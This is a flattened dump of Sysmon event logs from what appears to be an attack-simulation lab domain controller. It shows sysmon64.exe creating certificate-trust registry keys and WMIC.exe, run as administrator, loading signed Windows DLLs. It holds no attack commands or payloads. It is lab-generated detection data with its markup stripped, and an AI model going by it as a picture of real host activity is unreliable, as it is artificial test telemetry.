Corporationwebio.dllMD5=0CE65DF03820B5523EFE7D20258E6F0A,SHA256=9224732E1A7761866BB479C91A02C561F77B203EB20914F4ED0AF8FE320E8FF6trueMicrosoft WindowsValid 12241200x800000000000000057350049Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.874{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057350048Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.874{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057350047Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.874{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057350046Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.874{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057350045Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.874{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057350044Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.874{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057350043Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.874{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057350042Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.874{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057350041Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.874{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057350040Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.874{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057350039Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057350038Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057350037Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057350036Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057350035Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057350034Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057350033Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057350032Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057350031Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057350030Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057350029Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057350028Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057350027Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057350026Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057350025Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057350024Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.843{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\ntasn1.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft ASN.1 APIMicrosoft® Windows® Operating SystemMicrosoft Corporationntasn1.dllMD5=A45B23E8D2623CE3F760377766AF3E24,SHA256=E0A8F5055CD9E2AF029B8537E09EFFAF1F46C724CB720A6395DCF563EF70B843trueMicrosoft WindowsValid 12241200x800000000000000057350023Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057350022Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057350021Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057350020Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057350019Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057350018Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057350017Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057350016Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057350015Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057350014Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057350013Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057350012Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.858{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\dhcpcsvc.dll10.0.14393.3930 (rs1_release.200901-1914)DHCP Client ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationdhcpcsvc.dllMD5=CD3B9633BBEF2102C4665A2C39EC0B1A,SHA256=341EFB4806BE39E09AA90CA3B069C39F2A9D61FA9B512350B2721D41875AFCAEtrueMicrosoft WindowsValid 734700x800000000000000057350011Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.858{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\dhcpcsvc6.dll10.0.14393.3930 (rs1_release.200901-1914)DHCPv6 ClientMicrosoft® Windows® Operating SystemMicrosoft Corporationdhcpcsvc6.dllMD5=1721EAC44BCFC7177AA664ADCA514F23,SHA256=C099BCCE44A04A48147DE8CF093EBF997510154113789BF31394B5148F60B375trueMicrosoft WindowsValid 12241200x800000000000000057350010Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057350009Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057350008Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057350007Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057350006Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057350005Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057350004Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057350003Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057350002Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057350001Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057350000Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 734700x800000000000000057349999Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.843{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\ncrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows NCrypt RouterMicrosoft® Windows® Operating SystemMicrosoft Corporationncrypt.dllMD5=025DBE9D0F7AE719C64DE3A4555A7C0A,SHA256=1A223828A444E7797A9E00632DAE81AC3AC68B38786E67912B1C3FC6118FB6B4trueMicrosoft WindowsValid 12241200x800000000000000057349998Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349997Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349996Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349995Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349994Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349993Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349992Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349991Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349990Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349989Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349988Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349987Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 13241300x800000000000000057349986Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.858{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 13241300x800000000000000057349985Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.858{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 13241300x800000000000000057349984Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.858{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 13241300x800000000000000057349983Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.858{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 13241300x800000000000000057349982Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.858{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 13241300x800000000000000057349981Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.858{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 12241200x800000000000000057349980Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349979Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057349978Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057349977Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057349976Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349975Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349974Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349973Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 734700x800000000000000057349972Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.858{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\cryptnet.dll10.0.14393.2035 (rs1_release_inmarket.180110-1910)Crypto Network Related APIMicrosoft® Windows® Operating SystemMicrosoft CorporationCRYPTNET.DLLMD5=C826D7EA2E1A6884120676A0A3CBC714,SHA256=B4EFCCA21ADC0FF2FD3505DD9F9F6D6F66CFF229FE21D97DFEF19F1D485769A0trueMicrosoft WindowsValid 12241200x800000000000000057349971Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349970Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349969Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349968Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349967Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349966Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349965Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349964Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349963Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 734700x800000000000000057349962Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.843{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\mskeyprotect.dll10.0.14393.4046 (rs1_release.201028-1803)Microsoft Key Protection ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmskeyprotect.dllMD5=87A5C9919D4A67629718959772E120DD,SHA256=707BD6ECE458848F7343C2CF3184A74D99C40E7F5E58E5DA608E4C88D03609E4trueMicrosoft WindowsValid 12241200x800000000000000057349961Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349960Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349959Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349958Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349957Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349956Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349955Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 